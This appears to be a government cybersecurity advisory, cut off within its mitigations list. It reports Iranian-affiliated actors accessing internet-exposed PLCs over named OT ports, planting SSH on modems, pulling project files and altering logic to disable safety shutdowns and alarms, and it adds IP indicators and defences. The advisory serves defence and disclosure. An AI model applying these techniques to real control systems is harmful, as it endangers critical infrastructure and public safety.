&lt;h3&gt;&lt;strong&gt;Ongoing Threat Actor Activity Against U.S.-Based Programmable Logic Controllers&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The FBI observed Iranian-affiliated APT actors targeting internet-exposed PLCs with the intent to cause disruptions—including maliciously interacting with project files, and manipulating data displayed on HMI and SCADA displays—to U.S. critical infrastructure organizations. Iranian-affiliated APT targeting campaigns against U.S. critical infrastructure have recently escalated, likely in response to hostilities between Iran, and the United States and Israel.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026) &lt;/strong&gt;&lt;/em&gt;At one U.S. victim, the FBI observed the APT actors download a malicious project file to a targeted PLC using configuration software. Analysis indicated the project file retained ladder logic for downstream function but added logic that overrode specific instruction sets responsible for maintaining safe operating parameters in the victim’s environment.&lt;/p&gt;
&lt;p&gt;Since at least March 2026, the authoring agencies identified (through engagements with victim organizations) an Iranian-affiliated APT group disrupted the function of PLCs. Organizations across several U.S. critical infrastructure sectors (including &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector&quot; title=&quot;Government Services and Facilities&quot;&gt;Government Services and Facilities&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot; title=&quot;Water and Wastewater Systems&quot;&gt;WWS&lt;/a&gt;, and &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector&quot; title=&quot;Energy&quot;&gt;Energy&lt;/a&gt; Sectors) deployed these PLCs within a wide variety of industrial automation processes. Some of the victims experienced operational disruption and financial loss.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Technical Details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This advisory uses the &lt;a href=&quot;https://attack.mitre.org/versions/v19/matrices/enterprise/&quot; target=&quot;_blank&quot; title=&quot;MITRE ATTACK Matrix for Enterprise&quot;&gt;MITRE ATT&amp;amp;CK&lt;sup&gt;®&lt;/sup&gt; Matrix for Enterprise&lt;/a&gt; framework, version 19.&amp;nbsp;See the &lt;a href=&quot;#MITRE&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt; section of this advisory for tables of the threat actors’ activity mapped to MITRE ATT&amp;amp;CK tactics and techniques.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Initial Access&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;(Updated, July 22, 2026)&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;The authoring agencies observed Iranian-affiliated APT actors using several foreign-based IP addresses to access internet-facing PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and potentially other manufactured PLCs [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0883/&quot; target=&quot;_blank&quot; title=&quot;T0883&quot;&gt;T0883&lt;/a&gt;]. The actors used leased, third-party hosted infrastructure and manufacturers’ PLC programming software to connect to misconfigured victim PLCs. Inbound malicious traffic has been observed targeting PLC devices on the following ports: &lt;code&gt;44818&lt;/code&gt;, &lt;code&gt;2222&lt;/code&gt;, &lt;code&gt;102&lt;/code&gt;, and &lt;code&gt;502&lt;/code&gt;, as well as targeting modems on port &lt;code&gt;22&lt;/code&gt;. Targeted devices include:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Rockwell Automation:&lt;/strong&gt; CompactLogix and Micro850 PLCs&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schneider Electric:&lt;/strong&gt; BMX P34/Modicon M340 PLCs&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Siemens:&lt;/strong&gt; S7-1200 series PLCs&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Command and Control&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;(Updated, July 22, 2026)&lt;/strong&gt;&lt;/em&gt; The targeting of ports [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0885/&quot; target=&quot;_blank&quot; title=&quot;T0885&quot;&gt;T0885&lt;/a&gt;] associated with other OT vendors’ protocols suggests these actors are opportunistically targeting devices manufactured by companies other than Rockwell Automation/Allen-Bradley, including Schneider Electric and Siemens. In one reported instance, the actors utilized Dropbear Secure Shell (SSH) software on victim modems to enable them to gain remote access through port &lt;code&gt;22&lt;/code&gt; [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1219/&quot; target=&quot;_blank&quot; title=&quot;T1219&quot;&gt;T1219&lt;/a&gt;].&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Exfiltration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026) &lt;/strong&gt;&lt;/em&gt;The authoring agencies observed Iranian-affiliated APT actors using configuration software—such as Rockwell Automation’s Studio 5000 Logix Designer, Schneider Electric’s EcoStruxure Control Expert, and Siemens’ Totally Integrated Automation (TIA) Portal—on leased, third-party hosted infrastructure to exfiltrate device project files from PLC devices to threat-actor-controlled infrastructure [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1041/&quot; target=&quot;_blank&quot; title=&quot;T1041&quot;&gt;T1041&lt;/a&gt;].&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;(Updated, July 22, 2026)&lt;/strong&gt;&lt;/em&gt; After the actors extracted device project files, the FBI and CISA identified the modification and deletion of project file logic, to include Add-On Instructions (AOIs) and data manipulation on HMI and SCADA displays [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1565/&quot; target=&quot;_blank&quot; title=&quot;T1565&quot;&gt;T1565&lt;/a&gt;]. Additionally, the changes disabled critical shutdown and alarm logic, allowing systems to enter unsafe conditions without notifying operators of the anomalies.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; An AOI is analogous to a “Function Block” or “User Defined Function Block” used in other PLC vendor programs.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Indicators of Compromise&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;and &lt;a href=&quot;#Table2&quot;&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/a&gt; for recent IP addresses used by the Iranian-affiliated APT actors to communicate with PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, and Siemens in the United States.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; The FBI observed the threat actors using the IP addresses listed below in the specified time frames. This data is being provided for customers to query against logs for indications of historical targeting by the Iranian-affiliated APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table1&quot;&gt;&lt;/a&gt;Table 1. Indicators of Compromise &lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Indicator&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Beginning of Actor Association&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;End of Actor Association&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]175&lt;/td&gt;
&lt;td&gt;September 2025&lt;/td&gt;
&lt;td&gt;February 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;141.11.164[.]153&lt;/td&gt;
&lt;td&gt;January 2026&lt;/td&gt;
&lt;td&gt;June 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;175.110.121[.]42&lt;/td&gt;
&lt;td&gt;February 2026&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;175.110.121[.]39&lt;/td&gt;
&lt;td&gt;February 2026&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;175.110.121[.]41&lt;/td&gt;
&lt;td&gt;February 2026&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;175.110.121[.]107&lt;/td&gt;
&lt;td&gt;February 2026&lt;/td&gt;
&lt;td&gt;February 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;192.142.54[.]79&lt;/td&gt;
&lt;td&gt;May 2026&lt;/td&gt;
&lt;td&gt;June 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;84.200.205[.]165&lt;/td&gt;
&lt;td&gt;May 2026&lt;/td&gt;
&lt;td&gt;June 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;185.225.17[.]225&lt;/td&gt;
&lt;td&gt;June 2026&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;79.133.46[.]209&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;88.80.150[.]199&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;88.80.150[.]200&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;88.80.150[.]202&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;td&gt;July 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table2&quot;&gt;&lt;/a&gt;Table 2. Indicators of Compromise&amp;nbsp;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Indicator&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Beginning of Actor Association&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;End of Actor Association&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]162&lt;/td&gt;
&lt;td&gt;January 2025&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]164&lt;/td&gt;
&lt;td&gt;January 2025&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]165&lt;/td&gt;
&lt;td&gt;January 2025&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]167&lt;/td&gt;
&lt;td&gt;January 2025&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]168&lt;/td&gt;
&lt;td&gt;January 2025&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]170&lt;/td&gt;
&lt;td&gt;January 2025&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;185.82.73[.]171&lt;/td&gt;
&lt;td&gt;January 2025&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;135.136.1[.]133&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;td&gt;March 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;MITRE&quot;&gt;&lt;/a&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;MITRE&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table3&quot;&gt;&lt;strong&gt;Table 3&lt;/strong&gt;&lt;/a&gt; to &lt;a href=&quot;#Table6&quot;&gt;&lt;strong&gt;Table 6&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;for all referenced threat actor tactics and techniques in this advisory. The authoring agencies recommend organizations review historical TTPs for similar Iranian-affiliated cyber actor activity in &lt;a href=&quot;https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a&quot; title=&quot;IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities&quot;&gt;IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities&lt;/a&gt;. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;amp;CK framework, see CISA and MITRE ATT&amp;amp;CK’s &lt;a href=&quot;https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping&quot; title=&quot;Best Practices for MITRE ATT&amp;amp;CK Mapping&quot;&gt;Best Practices for MITRE ATT&amp;amp;CK Mapping&lt;/a&gt; and CISA’s &lt;a href=&quot;https://github.com/cisagov/Decider/&quot; title=&quot;Decider Tool&quot;&gt;Decider Tool&lt;/a&gt;.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table3&quot;&gt;&lt;/a&gt;Table 3. Initial Access&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Internet Accessible Device&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0883/&quot; target=&quot;_blank&quot; title=&quot;T0833&quot;&gt;T0883&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The actors accessed and interacted with publicly exposed, internet-accessible PLCs that lacked sufficient network and/or hardening security controls.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 4. Command and Control&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Commonly Used Port&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T0885/&quot; target=&quot;_blank&quot; title=&quot;T0885&quot;&gt;T0885&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The actors leveraged commonly used OT ports to communicate with PLCs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote Access Tools&amp;nbsp;&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1219/&quot; target=&quot;_blank&quot; title=&quot;T1219&quot;&gt;T1219&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The actors deployed Dropbear SSH software on victim modems to enable them to gain remote access through port &lt;code&gt;22&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 5. Exfiltration &lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration Over C2 Channel&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1041/&quot; target=&quot;_blank&quot; title=&quot;T1041&quot;&gt;T1041&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The actors used remote, third-party hosted infrastructure as a C2 channel to transfer device project files out of victim environments.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table6&quot;&gt;&lt;/a&gt;Table 6. Impact&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Data Manipulation&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1565/&quot; target=&quot;_blank&quot; title=&quot;T1565&quot;&gt;T1565&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The actors maliciously interacted with project files, including modifying and deleting project file logic, and altered data displayed on HMI and SCADA displays.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the &lt;a href=&quot;https://www.cisa.gov/cpg&quot; title=&quot;Cross-Sector Cybersecurity Performance Goals (CPGs)&quot;&gt;Cross-Sector Cybersecurity Performance Goals (CPGs)&lt;/a&gt; developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s &lt;a href=&quot;https://www.cisa.gov/cpg&quot; title=&quot;CPGs webpage&quot;&gt;CPGs webpage&lt;/a&gt; for more information on the CPGs, including additional recommended baseline protections.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Network Defenders&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The cyber threat actors accessed PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and potentially other branded/manufactured PLCs to cause disruptions to victim systems. To safeguard against this threat and threats to other types of PLCs, the authoring agencies urge organizations to consider the following mitigations.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;(Updated, July 22, 2026)&lt;/strong&gt;&lt;/em&gt; In addition to contacting the authoring agencies, organizations and integrators operating PLCs from the manufacturers mentioned in this advisory should review the previously issued guidance to strengthen the security of their OT deployments:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Rockwell Automation:&lt;/strong&gt; Contact the Rockwell Automation Product Security Incident Response Team (PSIRT) at &lt;a href=&quot;mailto:PSIRT@rockwellautomation.com&quot;&gt;PSIRT@rockwellautomation.com&lt;/a&gt; for questions regarding this guidance, or to report cyber incidents related to Rockwell Automation products.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Refer to Rockwell Automation Security Advisory &lt;a href=&quot;https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1771.html&quot; target=&quot;_blank&quot; title=&quot;SD1771&quot;&gt;SD1771&lt;/a&gt; for recommended PLC hardening measures and configuration guidance.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schneider Electric:&lt;/strong&gt; Contact the Schneider Electric Corporate Product Cyber Emergency Response Team (CPCERT) at &lt;a href=&quot;mailto:cpcert@se.com&quot;&gt;cpcert@se.com&lt;/a&gt; for questions regarding this guidance, or to report cyber incidents related to Schneider Electric products.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Refer to Schneider Electric’s &lt;a href=&quot;https://download.se.com/files?p_File_Name=Cybersecurity_Best+Practices_EN.pdf&amp;amp;p_Doc_Ref=7EN52-0390&amp;amp;p_enDocType=White+Paper&quot; target=&quot;_blank&quot; title=&quot;Recommended Cybersecurity Best Practices&quot;&gt;Recommended Cybersecurity Best Practices&lt;/a&gt; and &lt;a href=&quot;https://download.se.com/files?p_Doc_Ref=EIO0000001999&amp;amp;p_enDocType=User+guide&amp;amp;p_File_Name=EIO0000001999-13_Modicon_Controller_Platform_Cybersecurity_Guide_EN.pdf&quot; target=&quot;_blank&quot; title=&quot;Cybersecurity User Guide for Modicon Controller Platform&quot;&gt;Cybersecurity User Guide for Modicon Controller Platform&lt;/a&gt; for guidance on securing and configuring PLCs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Siemens:&lt;/strong&gt; Contact Siemens ProductCERT at &lt;a href=&quot;mailto:productcert@siemens.com&quot;&gt;productcert@siemens.com&lt;/a&gt; for questions regarding this guidance, or to report cyber incidents and vulnerabilities related to Siemens products.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Refer to &lt;a href=&quot;https://cert-portal.siemens.com/productcert/html/ssb-104599.html&quot; target=&quot;_blank&quot; title=&quot;Siemens Security Bulletin 104599&quot;&gt;Siemens Security Bulletin 104599&lt;/a&gt; for a list of security measures to harden PLCs and in-depth configuration guides.&lt;/li&gt;
&lt;li&gt;Siemens users should review the &lt;a href=&quot;https://cert-portal.siemens.com/operational-guidelines-industrial-security.pdf&quot; target=&quot;_blank&quot; title=&quot;Cybersecurity for Industry Operational Guidelines&quot;&gt;Cybersecurity for Industry Operational Guidelines&lt;/a&gt; and implement defense-in-depth controls within their automation systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Immediate steps to prevent the attack:&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Disconnect the PLC from the public-facing internet&lt;/strong&gt; [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#SecureInternetFacingDevices3S&quot; title=&quot;CPG 3.S&quot;&gt;CPG 3.S&lt;/a&gt;]. Follow the joint guidance &lt;a href=&quot;https://www.ncsc.gov.uk/collection/operational-technology/secure-connectivity&quot; target=&quot;_blank&quot; title=&quot;Secure Connectivity Principles for OT&quot;&gt;Secure connectivity principles for OT&lt;/a&gt; to safely allow remote access. Specifically, “remove inbound port exposure,” so the OT system is never directly exposed to the internet or external networks, and to ensure all access is mediated, monitored, and controlled. Do this through a secure gateway (jump host) that brokers the connection.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Ensure cellular modems, used for remote field connectivity and access, are secured with strong authentication and updated.&lt;/li&gt;
&lt;li&gt;Enable logs for connected modems and regularly review for suspicious activity to detect intrusions and improve incident response speed.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;To mitigate unauthorized access to OT via cellular modems, organizations should consider implementing isolated architectures, such as private Access Point Name (APN), 5G Public Network Integrated Non-Public Network (PNI-NPN), cellular Software-Defined Wide Area Network (SD-WAN), Zero Trust Network Access (ZTNA), or a site-to-site virtual private network (VPN).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;strong&gt;Strictly control network access to PLC devices.&lt;/strong&gt;&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;Configure firewall rules or access control list (ACL) security features on PLCs or programmable controllers to allow only authorized communications between expected control system devices. Block access from unauthorized or threat actor-controlled IP addresses, such as those associated with hosting providers.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;For controllers with a physical mode switch, place the physical mode switch into run position to prevent remote modification.&amp;nbsp;&lt;/strong&gt;Devices should only be in the program or remote position when updating or downloading software online and immediately switched back to the run position when complete. (See Rockwell Automation’s&lt;a href=&quot;#Note2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt;&lt;sup&gt; &lt;/sup&gt;&lt;a href=&quot;https://literature.rockwellautomation.com/idc/groups/literature/documents/rm/secure-rm001_-en-p.pdf&quot; target=&quot;_blank&quot; title=&quot;System Security Design Guidelines&quot;&gt;System Security Design Guidelines&lt;/a&gt; for manufacturer’s instructions.)&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt; &lt;/em&gt;Prior to switching the device to run mode, review and validate project files, as changing modes will lock in the current project file downloaded to the device.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;For devices that allow software key switching,&amp;nbsp;&lt;/strong&gt;enable programming protection in PLC configuration software (S7 TIA Portal) to limit who can modify PLCs remotely. (See Siemens’ &lt;a href=&quot;https://assets.new.siemens.com/siemens/assets/api/uuid:c9a2de6e-6bd0-4c32-bba0-f64cac44fcc9/industrial-security-operational-guidelines-en.pdf&quot; target=&quot;_blank&quot; title=&quot;Cybersecurity for Industry Operational Guidelines&quot;&gt;Cybersecurity for Industry Operational Guidelines&lt;/a&gt; for the manufacturer’s instructions.)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Follow-up steps to strengthen security posture:&lt;/strong&gt;&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt;&amp;nbsp;&lt;/em&gt;&lt;strong&gt;Review project files running on PLCs for unauthorized changes.&lt;/strong&gt; Use vendor-provided integrity checking tools and visually compare the running program to known good logic. Ensure reusable logic and input/output configurations are valid. For Rockwell Automation PLCs listed in the &lt;a href=&quot;https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1771.html&quot; target=&quot;_blank&quot; title=&quot;Customer Guidance to Disconnect Devices from the Internet&quot;&gt;Customer Guidance to Disconnect Devices from the Internet&lt;/a&gt;, check the AOIs for any anomalous modifications.&lt;br&gt;
&lt;ul type=&quot;circle&quot;&gt;
&lt;li&gt;If restoring from backups, verify the backup does not contain malicious logic before deployment.&lt;/li&gt;
&lt;li&gt;Review logs and configurations on all connected devices, including modems, HMIs, and workstations, to assess potential lateral movement by threat actors. If it appears the actors connected to additional devices, reimage these devices to remove any potential malicious changes or access tools.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt;&amp;nbsp;&lt;/em&gt;&lt;strong&gt;Ensure device passwords are changed from their default &lt;/strong&gt;and are configured to use complex, unique combinations of letters, numbers, and symbols that are not easily guessable. Implementing robust password practices remains a critical security measure that can help prevent unauthorized access and strengthen the overall security posture of OT devices.&lt;/li&gt;
